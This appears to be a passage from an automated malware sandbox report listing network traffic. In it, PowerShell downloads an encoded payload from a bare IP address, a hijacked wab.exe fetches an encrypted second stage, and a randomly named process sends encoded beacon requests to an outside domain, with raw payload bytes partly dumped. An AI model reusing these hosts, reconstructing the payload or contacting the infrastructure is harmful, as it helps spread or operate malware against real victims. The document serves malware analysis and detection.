                                May 2, 2024 17:14:08.733887911 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733931065 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733944893 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733957052 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733968973 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733982086 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733994961 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.734009981 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.734078884 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:13.568608999 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:13.569350004 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:43.585829020 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:15:04.104954958 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.230110884 CEST804972534.174.122.2192.168.2.6
                                May 2, 2024 17:15:04.230201006 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.232594967 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.357922077 CEST804972534.174.122.2192.168.2.6
                                May 2, 2024 17:15:04.698895931 CEST804972534.174.122.2192.168.2.6
                                May 2, 2024 17:15:04.699012041 CEST804972534.174.122.2192.168.2.6
                                May 2, 2024 17:15:04.699079037 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.701972961 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.827132940 CEST804972534.174.122.2192.168.2.6

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 2, 2024 17:13:05.690109015 CEST6515753192.168.2.61.1.1.1
                                May 2, 2024 17:13:05.778520107 CEST53651571.1.1.1192.168.2.6
                                May 2, 2024 17:15:03.883065939 CEST6349553192.168.2.61.1.1.1
                                May 2, 2024 17:15:04.096370935 CEST53634951.1.1.1192.168.2.6
                                May 2, 2024 17:15:19.752890110 CEST5783153192.168.2.61.1.1.1
                                May 2, 2024 17:15:19.882775068 CEST53578311.1.1.1192.168.2.6

                                ICMP Packets

                                TimestampSource IPDest IPChecksumCodeType
                                May 2, 2024 17:13:05.798916101 CEST192.168.2.6142.251.40.2064d5aEcho
                                May 2, 2024 17:13:05.922941923 CEST142.251.40.206192.168.2.6555aEcho Reply

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                May 2, 2024 17:13:05.690109015 CEST192.168.2.61.1.1.10x1e8eStandard query (0)google.comA (IP address)IN (0x0001)false
                                May 2, 2024 17:15:03.883065939 CEST192.168.2.61.1.1.10xb05eStandard query (0)www.facesofhoustontx.comA (IP address)IN (0x0001)false
                                May 2, 2024 17:15:19.752890110 CEST192.168.2.61.1.1.10x8c26Standard query (0)www.timesrenewables.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 2, 2024 17:13:02.938816071 CEST1.1.1.1192.168.2.60xe285No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                May 2, 2024 17:13:02.938816071 CEST1.1.1.1192.168.2.60xe285No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                May 2, 2024 17:13:05.778520107 CEST1.1.1.1192.168.2.60x1e8eNo error (0)google.com142.251.40.206A (IP address)IN (0x0001)false
                                May 2, 2024 17:13:39.178864002 CEST1.1.1.1192.168.2.60x124No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                May 2, 2024 17:13:39.178864002 CEST1.1.1.1192.168.2.60x124No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                May 2, 2024 17:14:23.106656075 CEST1.1.1.1192.168.2.60xa632No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                May 2, 2024 17:14:23.106656075 CEST1.1.1.1192.168.2.60xa632No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                May 2, 2024 17:15:04.096370935 CEST1.1.1.1192.168.2.60xb05eNo error (0)www.facesofhoustontx.com34.174.122.2A (IP address)IN (0x0001)false
                                May 2, 2024 17:15:19.882775068 CEST1.1.1.1192.168.2.60x8c26No error (0)www.timesrenewables.comtimesrenewables.comCNAME (Canonical name)IN (0x0001)false
                                May 2, 2024 17:15:19.882775068 CEST1.1.1.1192.168.2.60x8c26No error (0)timesrenewables.com3.33.130.190A (IP address)IN (0x0001)false
                                May 2, 2024 17:15:19.882775068 CEST1.1.1.1192.168.2.60x8c26No error (0)timesrenewables.com15.197.148.33A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • 87.121.105.54
                                • www.facesofhoustontx.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.64971387.121.105.54805692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                May 2, 2024 17:13:09.809696913 CEST173OUTGET /Ommestrup.deploy HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: 87.121.105.54
                                Connection: Keep-Alive
                                May 2, 2024 17:13:09.982659101 CEST1289INHTTP/1.1 200 OK
                                Date: Thu, 02 May 2024 15:13:09 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Last-Modified: Tue, 30 Apr 2024 08:19:38 GMT
                                ETag: "715e8-6174c07ea1a80"
                                Accept-Ranges: bytes
                                Content-Length: 464360
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/octet-stream
                                Data Raw: 36 77 4a 39 77 58 45 42 6d 37 76 51 36 78 77 41 63 51 47 62 36 77 49 45 50 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 68 78 47 30 5a 58 45 42 6d 33 45 42 6d 34 48 78 7a 68 61 78 72 58 45 42 6d 33 45 42 6d 34 48 78 53 51 63 46 79 48 45 42 6d 2b 73 43 4c 46 62 72 41 6e 6e 51 36 77 49 6a 4b 62 71 4e 45 74 6d 6e 36 77 4a 32 77 33 45 42 6d 2b 73 43 66 38 6a 72 41 6e 66 55 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 76 72 41 72 31 7a 63 51 47 62 30 65 4a 78 41 5a 76 72 41 73 38 37 67 38 45 45 36 77 4a 59 73 58 45 42 6d 34 48 35 38 4f 59 33 42 58 7a 4c 36 77 4b 52 61 75 73 43 32 34 57 4c 52 43 51 45 36 77 4c 6e 62 6e 45 42 6d 34 6e 44 63 51 47 62 63 51 47 62 67 63 50 75 43 7a 59 45 36 77 4b 54 77 6e 45 42 6d 37 71 65 55 4e 53 4a 36 77 4b 6f 6c 6e 45 42 6d 34 48 79 64 5a 54 4c 6f 2b 73 43 30 43 48 72 41 6b 66 75 67 63 49 56 4f 2b 44 56 36 77 4a 32 68 6e 45 42 6d 2b 73 43 45 37 70 78 41 5a 76 72 41 72 54 35 63 51 47 62 69 77 77 51 36 77 4b 52 65 58 45 42 6d 34 6b 4d 45 33 45 42 6d 33 45 42 6d 30 4c 72 41 76 [TRUNCATED]
                                Data Ascii: 6wJ9wXEBm7vQ6xwAcQGb6wIEPwNcJARxAZtxAZu5hxG0ZXEBm3EBm4HxzhaxrXEBm3EBm4HxSQcFyHEBm+sCLFbrAnnQ6wIjKbqNEtmn6wJ2w3EBm+sCf8jrAnfUMcpxAZtxAZuJFAvrAr1zcQGb0eJxAZvrAs87g8EE6wJYsXEBm4H58OY3BXzL6wKRausC24WLRCQE6wLnbnEBm4nDcQGbcQGbgcPuCzYE6wKTwnEBm7qeUNSJ6wKolnEBm4HydZTLo+sC0CHrAkfugcIVO+DV6wJ2hnEBm+sCE7pxAZvrArT5cQGbiwwQ6wKReXEBm4kME3EBm3EBm0LrAvKk6wIxioH65OIEAHXV6wIfHusCIKKJXCQM6wJYM3EBm4HtAAMAAHEBm+sCNDSLVCQIcQGbcQGbi3wkBHEBm3EBm4nr6wIlqOsCGDKBw5wAAADrAv8fcQGbU3EBm3EBm2pAcQGb6wIZ1Inr6wI8KHEBm8eDAAEAAADgVwXrAn3UcQGbgcMAAQAA6wKI4nEBm1NxAZvrAuW8ietxAZvrAtv1ibsEAQAAcQGb6wKfZ4HDBAEAAHEBm+sCiRFTcQGbcQGbav/rAtRJ6wL2q4PCBXEBm3EBmzH2cQGbcQGbMcnrAohWcQGbixrrAuV86wIPrUFxAZvrAmFYORwKdfNxAZtxAZtG6wKH8esCUVCAfAr7uHXd6wLg2esCXGuLRAr86wLJTOsCnFwp8HEBm3EBm//S6wJLQ+sCDeS65OIEAHEBm3EBmzHAcQGb6wLsBYt8JAzrApCB6wK7sIE0BzMTHYPrAgHZcQGbg8AEcQGbcQGbOdB15XEBm3EBm4n76wKsm3EBm//XcQGb6wJBPrf/e74gIHsG8Jr4CmbHp8Vu5P4CwZxwBBaS769SNm4CwfZP1oY6yQhmx0gK1qotFAt2nHJO44PQsuJAqUIJnHI7XsqvCsnaxz4Tb2gnBZzHPhOvzJelnPc+
                                May 2, 2024 17:13:09.982822895 CEST1289INData Raw: 45 37 64 71 72 58 2b 63 78 7a 34 54 62 36 37 72 54 4a 51 47 32 52 49 64 67 37 66 59 70 64 56 30 6b 50 36 32 4e 7a 4b 4d 4b 68 36 57 69 6f 77 35 6c 39 79 32 2b 74 30 66 77 7a 4c 53 6c 67 62 5a 45 68 32 44 75 71 5a 5a 67 54 4d 54 6f 2f 42 4c 73 78
                                Data Ascii: E7dqrX+cxz4Tb67rTJQG2RIdg7fYpdV0kP62NzKMKh6Wiow5l9y2+t0fwzLSlgbZEh2DuqZZgTMTo/BLsxkH35LrvwiBkALFYD0eCJLbv61DUAf6kuaz+NAwusKYqMcxEx32upbXB/Hl2rhVlt4KtmscgzN1JEFVltwKrl8cgzMr1dBVKsVr5ssZgwvSlMZ3l9dq/48Zg1UqxNOLNZFVKy6FgzMTEgeqwxmDa5yY5zITHeW203s
                                May 2, 2024 17:13:09.983073950 CEST1289INData Raw: 6f 74 38 6e 77 6f 4a 74 4b 49 2b 50 2f 2b 44 6b 47 76 56 51 32 59 68 46 63 71 36 56 6c 65 73 47 6e 76 6f 45 75 4e 4e 61 45 32 67 6a 58 6d 4d 31 2b 39 6e 71 44 58 56 39 6a 52 61 66 64 59 70 75 6d 6d 61 6b 49 6f 78 45 78 30 36 58 6e 69 43 42 62 4c
                                Data Ascii: ot8nwoJtKI+P/+DkGvVQ2YhFcq6VlesGnvoEuNNaE2gjXmM1+9nqDXV9jRafdYpummakIoxEx06XniCBbLioUEU6E07YCdfxR4i+kYQFnJ/59cY7IS9BdCvmv6CMI4lSUcQJICYjmgkcMgbVAB7VJs2Vfz2OBRE/stf4Df07SG6+Eh7uvtLTTvA9gw5Ng2iGAo+DCee4E8fuvEUga51JEtFADlEcbgUludkp6GQoBah2VaAskNs
                                May 2, 2024 17:13:09.983124971 CEST1289INData Raw: 2b 49 68 5a 6f 74 6a 63 2f 6c 67 51 68 30 39 77 6c 31 6e 78 71 69 47 39 61 4c 52 78 5a 31 6f 67 77 37 2f 5a 68 6f 56 5a 45 61 44 48 63 61 4d 58 50 4f 77 78 4c 76 32 37 69 57 2b 34 49 7a 45 39 45 4b 6d 6c 51 32 36 55 71 4c 4f 61 49 2f 65 56 56 6d
                                Data Ascii: +IhZotjc/lgQh09wl1nxqiG9aLRxZ1ogw7/ZhoVZEaDHcaMXPOwxLv27iW+4IzE9EKmlQ26UqLOaI/eVVmJrgsWaY8dXvgAdjOMEwgzduhsoczmpirMhMd1IyfNxDRkupLn3eoAsSnymVNktqkoVvEAtwE/toxQYEK0RonHgrhbpBg9+n/4mZswETav0ul+IPn7FUC7Q8Tx/P49GDh1idXGDN1mENpltfcuF4BOYtrS6/bko+HM
                                May 2, 2024 17:13:09.983206034 CEST1289INData Raw: 39 6f 6d 44 2b 65 32 41 47 72 6d 4d 6f 35 6a 4d 7a 31 59 72 49 6a 70 43 75 66 70 37 56 51 69 33 33 6f 4f 73 6a 47 54 31 2b 50 42 4a 49 67 7a 4d 54 48 59 4d 7a 45 78 32 44 4d 78 4d 64 67 7a 4d 54 48 59 4d 7a 45 78 32 44 4d 32 77 64 37 34 4e 36 55
                                Data Ascii: 9omD+e2AGrmMo5jMz1YrIjpCufp7VQi33oOsjGT1+PBJIgzMTHYMzEx2DMxMdgzMTHYMzEx2DM2wd74N6U2TTt/ooKYNHbmJpAnSyJznuP+FKjDNGHYMzEx2DMxMdgzMTHYMzEx2DMxMdg0LzYED0N3lHEZIpp5p2fZiyJzl1UKGs0YkfZt4Tkt/Y6z/eAvGKsPYvQoEK0hoMHgvTaJDyHvgt7lBvhHnpmFfJ7mTGn45fJD6IWP
                                May 2, 2024 17:13:09.983253002 CEST1289INData Raw: 53 78 54 5a 6a 45 64 59 49 6b 55 71 48 61 6a 76 78 38 42 5a 47 62 67 43 42 64 30 64 57 56 6b 5a 52 47 4f 78 45 61 65 31 36 79 68 48 67 2f 45 48 34 6b 71 65 50 70 38 54 48 59 4e 4d 48 4a 6b 50 67 42 4d 64 32 37 49 58 4f 57 78 2b 69 45 73 43 48 7a
                                Data Ascii: SxTZjEdYIkUqHajvx8BZGbgCBd0dWVkZRGOxEae16yhHg/EH4kqePp8THYNMHJkPgBMd27IXOWx+iEsCHzetI9zsnLcXMKOEwkCm69QijQLAIFwYOpLuxH3qkwLYD/rQJEKBCtIaBB63wWCRYNPV2/6VJwyNODbK0YpjtEeK5A7AjRzxITIe/Z0ZvgfeSnu6+UgSgyOuHYMzEx2DMxMdgzMTHYMzEx2DMxMd82gkTQwEiZmUtHs
                                May 2, 2024 17:13:09.983308077 CEST1289INData Raw: 49 2b 6f 62 58 2f 49 75 47 69 78 39 54 79 2f 71 30 52 4e 2b 36 30 72 55 41 34 4e 70 73 35 31 6d 45 68 74 6b 6d 44 33 6b 67 4d 64 67 7a 79 63 47 53 6f 7a 45 30 4a 50 66 71 68 50 31 68 4f 69 41 65 6c 44 56 63 42 74 32 77 41 41 56 59 44 66 2f 45 50
                                Data Ascii: I+obX/IuGix9Ty/q0RN+60rUA4Nps51mEhtkmD3kgMdgzycGSozE0JPfqhP1hOiAelDVcBt2wAAVYDf/EPgorT0TJ1KgOOAEeONROAg7y5aayqdaD2NM5HOYKjD9cfMnEBWlzxrsvhVud29nHAvizqaugh+9S+6j+xoUpNRiHL3MBQSjPP8/KFmV3P8Ib0p9PVgt/lOUDlwe2Tn2gWnOsaFeFJa2LLlJ+2HMk44ykDzx7LgkFOR
                                May 2, 2024 17:13:09.983371973 CEST1289INData Raw: 67 78 44 33 52 67 6e 47 67 45 76 58 57 65 73 75 44 64 57 62 4a 4b 6e 45 42 55 4f 37 78 77 75 68 6a 63 36 6e 54 46 54 79 41 75 48 2b 4d 6c 41 59 72 71 6d 35 6d 33 39 34 31 48 59 41 64 6c 6f 47 79 39 4f 67 79 4b 37 63 63 4e 61 6a 71 59 39 70 6a 33
                                Data Ascii: gxD3RgnGgEvXWesuDdWbJKnEBUO7xwuhjc6nTFTyAuH+MlAYrqm5m3941HYAdloGy9OgyK7ccNajqY9pj3gJS5kShomoDXMRMdjDJOHYMzEx2DMxMdgzMTHYMzEx2DMxMdg1d5mEPbE0MONcKXW7GIcIBdwDmQuNpA07ykM1gYeaYvVLg4AsBhWDKFku4JbNJIAsBbYFj1RaMkop2DAsXWt2UekvPiA676AsXFxCj4mhsRM4zEV
                                May 2, 2024 17:13:09.983428001 CEST1289INData Raw: 34 35 78 38 46 64 54 73 36 7a 7a 70 68 55 67 35 4e 6d 46 71 48 2f 31 70 64 4d 65 76 4f 46 6c 45 67 30 6f 56 56 48 54 66 49 7a 4d 32 63 55 6b 63 66 6f 35 56 44 37 57 58 34 76 35 7a 61 43 35 67 35 63 77 31 6c 6e 35 71 59 37 7a 49 54 48 55 38 46 66
                                Data Ascii: 45x8FdTs6zzphUg5NmFqH/1pdMevOFlEg0oVVHTfIzM2cUkcfo5VD7WX4v5zaC5g5cw1ln5qY7zITHU8FfwC/H6Cqx17Kq76HZ/ETELa2HaCUNopSX8Jy++O2otv5XP0FtCkIBUZW4HBgLZ+tQKYp2zFbAsDo7hTAkvagpaeoCjg/X1v+9U11qZ6rllNUEmA+RiVrhQswS31HT2hoe+tp4a9POdzWHSiy+XoKx4ScaWb9kYey0b
                                May 2, 2024 17:13:09.983489037 CEST1289INData Raw: 45 72 39 45 64 64 69 36 36 74 48 52 45 51 6c 31 70 61 6b 6c 52 58 68 4a 67 49 70 4d 4d 6b 6c 70 35 73 2f 39 57 69 78 4a 44 48 50 77 6d 51 4f 74 68 65 54 50 54 41 69 2b 59 52 2b 44 4d 30 4f 6c 45 41 35 54 79 72 59 4a 5a 36 54 6e 42 6b 57 55 49 72
                                Data Ascii: Er9Eddi66tHREQl1paklRXhJgIpMMklp5s/9WixJDHPwmQOtheTPTAi+YR+DM0OlEA5TyrYJZ6TnBkWUIroWmjSU1pSbCmg4/48mVGt0Ftu57S57sXwW+tcbI3n1xPlteAXwWOZgiK/buq5OgTMTooxpkPACxFIn05tCpLyV53AC8nlbRuiS7CreqlTTr5r9gjuOJUJJMWC3AfitZKRc8m3mkn3P++krfzJA3wtUczXv2JQ8cUq
                                May 2, 2024 17:13:10.150049925 CEST1289INData Raw: 75 79 62 6d 44 32 4e 41 74 72 32 62 52 69 4e 51 59 45 4b 30 52 49 58 48 6c 55 71 33 66 6b 34 31 4a 43 61 5a 53 31 36 34 79 68 63 78 65 4f 34 72 30 50 67 70 4f 63 62 55 73 43 4f 46 68 78 50 62 6e 6b 70 44 30 57 58 75 4e 56 72 78 64 77 32 51 7a 56
                                Data Ascii: uybmD2NAtr2bRiNQYEK0RIXHlUq3fk41JCaZS164yhcxeO4r0PgpOcbUsCOFhxPbnkpD0WXuNVrxdw2QzVtQMdA9C2bJW9pl+Hac5IlQB+g9PbEk2WHi2bs0Ighjowkku5PQnOKAvARAxNMQYEK0RoHHgvKYIqD7riFUi3sG6OHdi2Ee4Ou+5nK2Bs4Bcyp8Jl1aXWYQmgcG9hkEx2DMxMdgzMTHYMzEx2DMxMdgzMTbcvg6xPx


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.64972187.121.105.54805512C:\Program Files (x86)\Windows Mail\wab.exe
                                TimestampBytes transferredDirectionData
                                May 2, 2024 17:14:07.891634941 CEST185OUTGET /iYbZIhIVLPBjJUzImyrJN72.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: 87.121.105.54
                                Cache-Control: no-cache
                                May 2, 2024 17:14:08.062421083 CEST1289INHTTP/1.1 200 OK
                                Date: Thu, 02 May 2024 15:14:07 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Last-Modified: Tue, 30 Apr 2024 07:27:49 GMT
                                ETag: "41e40-6174b4e9a8740"
                                Accept-Ranges: bytes
                                Content-Length: 269888
                                Content-Type: application/octet-stream
                                Data Raw: 0e fb 38 46 f1 30 57 87 74 ff ea 4b 05 06 cb b9 8c 65 2d 4d d1 f8 b4 8d d7 e9 10 39 06 77 79 f8 b4 fc 64 bf 72 9f 7f 95 b3 ad c2 98 b2 e0 56 a8 7a 00 cb 9a bb 22 d9 6e ac 7a 42 a2 9b c9 db 83 24 f2 a8 31 a5 41 65 b4 fb 53 88 e9 9f 16 b3 2b 16 e0 43 9c a0 e7 96 e7 2a 79 e9 2d 7c 7f 9a b1 a0 e1 b6 e4 83 76 fc fe b4 ab 7e 23 73 ef eb 75 a2 14 a9 60 00 51 88 32 64 8a 8e 32 be e0 bf 3f 92 af 6e 1f 00 a5 ee 99 64 eb 08 a4 bc 88 b8 b3 74 96 59 ed e5 4f 19 c6 9f e7 f9 b1 d1 78 0a ac b8 78 eb da e6 22 c8 11 70 14 f8 93 5b ab 82 fd 4e d1 e3 c8 87 3a ca b0 47 bd 70 2e 4e a1 c5 8e 52 52 f0 5c 0f 16 42 76 2d 3a af 39 b1 77 5d 63 a4 5f 33 5a ad 87 45 b2 a7 87 7e 6c 71 de a8 17 b2 66 c8 1c db 7b 5d 72 96 74 0d 16 0b 2a 03 71 0f 62 96 52 eb 19 d1 b3 63 4e 51 9d fe b3 f7 95 f2 87 bc 69 b9 41 3e 5a 3b d7 7d 46 73 6d 48 93 1c 5e c3 dc ff 94 30 bf 04 92 c0 4a a4 6a 01 b8 7a fb d5 25 c5 04 db 92 b9 3f fc 03 75 58 72 e4 ef 15 bc 7d 98 9d e7 4f 22 ac 0c f5 5a 80 2e ea c8 f2 c5 d4 85 00 48 e0 5b 9d a5 4c 8e ec 4c 2f a2 05 [TRUNCATED]
                                Data Ascii: 8F0WtKe-M9wydrVz"nzB$1AeS+C*y-|v~#su`Q2d2?ndtYOxx"p[N:Gp.NRR\Bv-:9w]c_3ZE~lqf{]rt*qbRcNQiA>Z;}FsmH^0Jjz%?uXr}O"Z.H[LL/,D4&Tb6]mp0`HWEv}9mpC"!G/1GB;)sa({Nz"h[Z)x~SnD<!DH5azf&P9Em_NP QN0p yG|vTW,AwobFexrI~JZc)`|~065K86DfBt@)Y,y5lX/>%Ps#D"?DTi~Mg$]0x`'p}U9N{*Z1tx5AA\3{=O|,*6~Z- QM(n(.]-_2V@kMggr5|6lP*Z+42qDuf:X8j7a^gCD3+Ukz7&(n.jMC<?G[ }P66!03jZ+J[P;Fmvd)`|'q&daNrhKDs;alib [TRUNCATED]
                                May 2, 2024 17:14:08.062469959 CEST1289INData Raw: ce a3 08 7e 28 03 1d e5 44 93 c3 9e 0b 91 27 25 38 9c fc 83 0a ac ea b6 3d 8a 1b fd 9c 2f fc 25 77 c0 c9 47 6a 14 9a c6 4d cc 3a 33 36 00 ef 45 55 3d 33 55 9f 49 c2 a0 42 bd 8b f7 9b d9 eb 8e f6 0f 96 f8 01 5b f7 8e 6b 25 9b a9 6d b3 f3 94 8c f5
                                Data Ascii: ~(D'%8=/%wGjM:36EU=3UIB[k%mdejbYzs~=BC=WIRR/d(~u3CNaQbS/S:qGSo9,'5u~gJ}l:(Q:3"!WR$$
                                May 2, 2024 17:14:08.062485933 CEST1289INData Raw: 10 c5 e2 c6 40 6b e5 11 d7 04 14 0d b7 b8 c7 dd ba c2 1e 4d b9 13 bc db b1 af d5 ec 67 67 dd e0 92 72 cd 35 08 07 fe ca a4 7c 9c d7 c9 d5 36 1d c4 ec d2 92 6c 50 2a ca 05 e3 5a f8 2b 34 32 82 71 7f 0e 44 e0 0b ed 9f d3 75 df 66 b7 3a 58 38 db d6
                                Data Ascii: @kMggr5|6lP*Z+42qDuf:X8j7a^gCD3+Ukz7&(n.jMC<?G[ }P66!03jZ+J[P;Fmvd)`|'q&daNrhKDs;ali
                                May 2, 2024 17:14:08.062499046 CEST1289INData Raw: ea 45 f6 8e fc 6d 5f f0 4e b4 f6 50 bf dd f6 58 25 96 98 1e da 3b f5 12 f5 60 95 20 79 bb c4 47 c5 6c e2 8d ee c1 1e 1a ee 76 16 dc 54 18 99 ff 77 2c c5 c5 07 41 84 9c 77 8b 13 84 fc 6f 62 d8 eb e8 d2 a5 ee 46 06 11 65 78 f7 eb a3 72 9a 49 7e 4a
                                Data Ascii: Em_NPX%;` yGlvTw,AwobFexrI~JZc)`|~065K86DfBt@)Y,y5lX/>%Ps#D"?DTi~Mg$]0x`'p}U9N{*Z1tx5AA\3{=O|,*6~
                                May 2, 2024 17:14:08.062515020 CEST1289INData Raw: 3a 1d da dd 9b 94 58 e7 22 41 b2 6d 12 d6 38 4b 4e 1e 60 b1 63 ef 92 5f 35 d6 04 da 2b aa 9a b3 9b 12 c8 27 4e 7d 18 32 31 d5 f4 4e 8d e5 b2 d4 f9 43 d0 1b 4c 39 6f 04 d8 3c b2 aa 93 ff 04 11 4a 92 ad b8 c8 dc ff 20 3b bf 04 92 fd ad a4 6a 01 b7
                                Data Ascii: :X"Am8KN`c_5+'N}21NCL9o<J ;j-P0mFy 2Y}_pO7|ymK"]9g).|Hp:KH91 \u)m.%Opz>0J>$h27&txtvgeU!*wC
                                May 2, 2024 17:14:08.062566042 CEST1289INData Raw: fb 5f 9d 38 a1 01 d4 86 58 35 87 f9 05 60 6b 1c 7e 1f 75 eb 17 2e 82 32 c8 e3 83 4e b2 96 26 95 38 4f 3b b1 a9 b0 ea 11 9d f7 84 0e c4 51 d2 4d c7 19 11 4a cd 10 da 9e cf 6a d7 01 f4 5b 27 a5 a2 bf 88 55 ef 81 d6 bf e8 f6 b4 c9 6c 7e be 80 ed fe
                                Data Ascii: _8X5`k~u.2N&8O;QMJj['Ul~TVIaz$:/1P4vi^B]Hp="P\/WMKbW_4(*ZlWT-*kIsKTYeVeb$~v@%i
                                May 2, 2024 17:14:08.062650919 CEST1289INData Raw: 53 a1 ca 5b 02 d6 76 ba d0 de d3 a6 bf ed 61 4d c1 34 f5 55 dc 22 73 96 6d 93 98 91 69 80 26 5e 61 0c ea 33 c2 1e f3 a1 e8 3d cd 6f df f4 f2 7b 1a 42 31 3d 16 eb 77 31 de b4 78 0e 07 43 a5 07 de 95 22 7c 28 cf c4 dd a3 9f b5 39 75 d9 47 ea 97 0d
                                Data Ascii: S[vaM4U"smi&^a3=o{B1=w1xC"|(9uGvIz0]Zp:O^M5lEDneM%sQe[{H5Rqi+M5X|+}Hl`vvY@N=z%A0K"
                                May 2, 2024 17:14:08.062717915 CEST1289INData Raw: 4a 6b cb a1 e7 db d9 78 65 ec 67 c9 b5 99 dc 8b 13 50 3b 52 d6 44 5f a7 ec a5 37 9f 12 52 b4 7d 27 71 ac dc f2 56 ab 76 02 fc 80 40 33 4c 73 94 68 c1 e2 f2 85 13 37 25 9e 85 db 9d 1d a6 ae 1b 4f 80 5b f1 b6 54 a6 77 d8 a7 df c1 21 d8 db 62 23 9e
                                Data Ascii: JkxegP;RD_7R}'qVv@3Lsh7%O[Tw!b#=H@CIMK}GZHX PR$~Mvb/uGd{z16[Ay?OpW-O:s^4t~V*IVs~-B[-R
                                May 2, 2024 17:14:08.062731981 CEST1289INData Raw: 7a e6 60 98 9d b6 01 8d 27 70 a9 8f 33 43 c8 74 f6 ba 67 41 9f 0e 13 93 e6 7d d9 f6 b1 b0 5a 0e db 92 21 27 35 fa 85 55 da a5 ea f3 d8 f4 34 09 42 83 35 97 be c7 bb 80 4c 48 4e fe fd d7 db 6d 13 7e ef 65 c6 93 6c 3b 08 e2 23 51 4d 00 92 c1 41 ab
                                Data Ascii: z`'p3CtgA}Z!'5U4B5LHNm~el;#QMA@]/YQ(`1MO^AahSK^h uuZ^!TA%!0)C`m(uMktR^gxoT;#k|*gAqy^2*NNv
                                May 2, 2024 17:14:08.062740088 CEST1289INData Raw: 42 ed fe 6c 66 e8 06 70 54 3b 43 22 3e 4b 9a a9 c4 1a 6a 65 63 8f 80 6d 4f b0 c5 44 9f a9 e2 40 32 e3 7f c0 3b dd 7a 22 21 7a 1c 61 40 79 f9 58 0f c7 30 a1 73 63 21 39 84 17 80 bd c2 1c 17 66 b1 c8 f7 76 c1 63 7d fa 96 ff 40 a3 86 db 9e 5c c5 fe
                                Data Ascii: BlfpT;C">KjecmOD@2;z"!za@yX0sc!9fvc}@\55(8#\Zt!MX%'!;I` GlU:S mmrw'-xEzP~J2R%2$#=/~BEK6f;5|"kt@){!T^
                                May 2, 2024 17:14:08.231386900 CEST1289INData Raw: 42 6c 23 73 50 ed 75 a2 14 17 33 48 51 88 a2 fd a1 4c e3 fe 95 46 c1 dd b6 db a7 41 17 6a 05 48 5c bf e4 73 aa 3c 50 58 ed f0 c8 67 2f c8 b4 fd 4b 52 9f b8 95 a5 ce 44 19 7a b0 70 90 be be 00 2f 1f f6 eb 0c d7 d9 23 be 04 69 a1 8f cc bd 63 bd c9
                                Data Ascii: Bl#sPu3HQLFAjH\s<PXg/KRDzp/#icN\%zUr:rY!Q(bvxQ=+s~g23\8 B0;=8m?4Z3e8P$vOd,0Z6B"PC


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.64972534.174.122.2807132C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
                                TimestampBytes transferredDirectionData
                                May 2, 2024 17:15:04.232594967 CEST564OUTGET /gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I= HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-US,en;q=0.9
                                Host: www.facesofhoustontx.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                May 2, 2024 17:15:04.698895931 CEST626INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Thu, 02 May 2024 15:15:04 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
